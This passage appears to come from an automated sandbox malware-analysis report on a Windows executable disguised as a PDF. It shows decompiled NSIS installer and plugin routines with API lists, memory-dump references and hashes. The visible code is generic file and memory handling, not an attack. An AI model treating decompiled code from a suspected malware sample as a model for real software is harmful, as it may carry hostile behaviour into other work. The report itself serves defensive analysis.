							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                                      0x100022e4
                                                                      0x100022e8
                                                                      0x100022f3
                                                                      0x100022f3
                                                                      0x100022fa
                                                                      0x100022ff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002303
                                                                      0x10002306
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000230b
                                                                      0x10002316
                                                                      0x10002326
                                                                      0x00000000
                                                                      0x1000231d
                                                                      0x1000231f
                                                                      0x10002335
                                                                      0x00000000
                                                                      0x10002335
                                                                      0x1000230d
                                                                      0x1000230d
                                                                      0x10002336
                                                                      0x10002336
                                                                      0x10002338
                                                                      0x1000233c
                                                                      0x1000233c
                                                                      0x1000233f
                                                                      0x1000233f
                                                                      0x10002347
                                                                      0x10002349
                                                                      0x10002350
                                                                      0x10002415
                                                                      0x10002416
                                                                      0x10002421
                                                                      0x1000244b
                                                                      0x1000244b
                                                                      0x10002431
                                                                      0x1000243d
                                                                      0x10002433
                                                                      0x10002433
                                                                      0x10002433
                                                                      0x00000000
                                                                      0x10002356
                                                                      0x10002356
                                                                      0x00000000
                                                                      0x1000235d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002366
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002374
                                                                      0x10002376
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002397
                                                                      0x1000239d
                                                                      0x100023a0
                                                                      0x100023a2
                                                                      0x100023b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000237f
                                                                      0x10002384
                                                                      0x10002387
                                                                      0x10002388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100023be
                                                                      0x100023c4
                                                                      0x100023c5
                                                                      0x100023c8
                                                                      0x100023c9
                                                                      0x100023cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100023dc
                                                                      0x100023df
                                                                      0x100023eb
                                                                      0x100023ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100023f9
                                                                      0x10002405
                                                                      0x10002408
                                                                      0x1000240a
                                                                      0x1000240d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002356
                                                                      0x10002350
                                                                      0x1000232b
                                                                      0x10002330
                                                                      0x00000000
                                                                      0x10002330

                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 4216380887-0
                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 76%
                                                                      			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                                      0x100024b3
                                                                      0x100024b5
                                                                      0x100024c4
                                                                      0x100024ca
                                                                      0x100024d7
                                                                      0x100024d9
                                                                      0x100024dd
                                                                      0x100024dd
                                                                      0x100024e5
                                                                      0x100024eb
                                                                      0x100024ed
                                                                      0x00000000
                                                                      0x100024f4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100024fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002504
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000250b
                                                                      0x10002511
                                                                      0x1000251d
                                                                      0x10002523
                                                                      0x10002528
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000254a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002530
                                                                      0x10002536
                                                                      0x10002537
                                                                      0x10002539
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002552
                                                                      0x10002554
                                                                      0x10002556
                                                                      0x10002558
                                                                      0x10002558
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100024ed
                                                                      0x1000255b
                                                                      0x1000255b
                                                                      0x10002560
                                                                      0x10002572
                                                                      0x10002572
                                                                      0x10002578
                                                                      0x1000257d
                                                                      0x10002582
                                                                      0x1000258e
                                                                      0x10002593
                                                                      0x00000000
                                                                      0x10002598
                                                                      0x10002584
                                                                      0x10002585
                                                                      0x10002599
                                                                      0x10002599
                                                                      0x10002582
                                                                      0x1000259a
                                                                      0x1000259e
                                                                      0x100025a1
                                                                      0x100025b8

                                                                      APIs
                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E004028C3(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C53(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405C3D(_t50) == 0) {
					E00402C53(0xffffffed);
				}
				E00405DC2(_t50);
				_t26 = E00405DE7(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a254;
					 *(_t56 - 0x38) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403402(_t45);
						E004033EC(_t49,  *(_t56 - 0x38));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x50) = _t54;
						if(_t54 != _t45) {
							E0040317B(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405DA2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x50));
						}
						E00405E99( *(_t56 + 8), _t49,  *(_t56 - 0x38));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E0040317B(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                      0x004028c3
                                                                      0x004028c5
                                                                      0x004028d1
                                                                      0x004028d4
                                                                      0x004028de
                                                                      0x004028e2
                                                                      0x004028e2
                                                                      0x004028e8
                                                                      0x004028f5
                                                                      0x004028fd
                                                                      0x00402900
                                                                      0x00402906
                                                                      0x00402914
                                                                      0x00402919
                                                                      0x0040291d
                                                                      0x00402920
                                                                      0x00402929
                                                                      0x00402935
                                                                      0x00402939
                                                                      0x0040293c
                                                                      0x00402946
                                                                      0x00402965
                                                                      0x0040294d
                                                                      0x00402952
                                                                      0x0040295a
                                                                      0x0040295d
                                                                      0x00402962
                                                                      0x00402962
                                                                      0x0040296c
                                                                      0x0040296c
                                                                      0x00402979
                                                                      0x0040297f
                                                                      0x00402991
                                                                      0x00402991
                                                                      0x00402997
                                                                      0x00402997
                                                                      0x004029a2
                                                                      0x004029a3
                                                                      0x004029a7
                                                                      0x004029ab
                                                                      0x004029b1
                                                                      0x004029b1
                                                                      0x004029b8
                                                                      0x0040224b
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                                      • GlobalFree.KERNEL32(?), ref: 0040296C
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                                      • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                                      • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                                      • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404B2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 77%
                                                                      			E00404B2D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406234(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406234(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406234(_t44, _t50, 0x423728, 0x423728, _a8);
				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
			}



















                                                                      0x00404b36
                                                                      0x00404b3b
                                                                      0x00404b43
                                                                      0x00404b44
                                                                      0x00404b51
                                                                      0x00404b59
                                                                      0x00404b5a
                                                                      0x00404b5c
                                                                      0x00404b5e
                                                                      0x00404b60
                                                                      0x00404b63
                                                                      0x00404b63
                                                                      0x00404b6a
                                                                      0x00404b70
                                                                      0x00404b70
                                                                      0x00404b77
                                                                      0x00404b7e
                                                                      0x00404b81
                                                                      0x00404b84
                                                                      0x00404b84
                                                                      0x00404b88
                                                                      0x00404b98
                                                                      0x00404b9a
                                                                      0x00404b9d
                                                                      0x00404b46
                                                                      0x00404b46
                                                                      0x00404b4d
                                                                      0x00404b4d
                                                                      0x00404ba5
                                                                      0x00404bb0
                                                                      0x00404bc6
                                                                      0x00404bd7
                                                                      0x00404bf3

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                                      • wsprintfW.USER32 ref: 00404BD7
                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$(7B
                                                                      • API String ID: 3540041739-1320723960
                                                                      • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                                      • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                                      • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                                      • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004025AE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 88%
                                                                      			E004025AE(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x50) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C53(0x11)) + _t16;
					} else {
						E00402C53(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp\System.dll");
					}
				} else {
					E00402C31("true");
					 *0x40add8 = __ax;
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E00406172(_t27, _t32);
					if((_t29 |  *(_t35 - 0x50)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405EC8(_t34, _t34) >= 0) {
						_t14 = E00405E99(_t34, "C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                      0x004025ae
                                                                      0x004025ae
                                                                      0x004025ae
                                                                      0x004025b3
                                                                      0x004025b6
                                                                      0x004025b9
                                                                      0x004025be
                                                                      0x004025c0
                                                                      0x004025e0
                                                                      0x0040261e
                                                                      0x004025e2
                                                                      0x004025e4
                                                                      0x004025fe
                                                                      0x00402609
                                                                      0x00402609
                                                                      0x004025c2
                                                                      0x004025c4
                                                                      0x004025c9
                                                                      0x004025d7
                                                                      0x004025da
                                                                      0x00402623
                                                                      0x00402626
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x0040262c
                                                                      0x00402635
                                                                      0x00402637
                                                                      0x00402656
                                                                      0x004015b4
                                                                      0x004015b6
                                                                      0x00000000
                                                                      0x004015bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402637
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nssE334.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nssE334.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000400,?,?,00000021), ref: 00402609
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nssE334.tmp$C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll
                                                                      • API String ID: 3109718747-2655648313
                                                                      • Opcode ID: 836a69fc2c8fbe888c000ad1d1831544f223077854536d2d6ffb893ada089d09
                                                                      • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
                                                                      • Opcode Fuzzy Hash: 836a69fc2c8fbe888c000ad1d1831544f223077854536d2d6ffb893ada089d09
                                                                      • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                      0x10001619
                                                                      0x10001625
                                                                      0x10001632
                                                                      0x10001639
                                                                      0x10001642
                                                                      0x1000164e

                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                      • String ID:
                                                                      • API String ID: 1148316912-0
                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
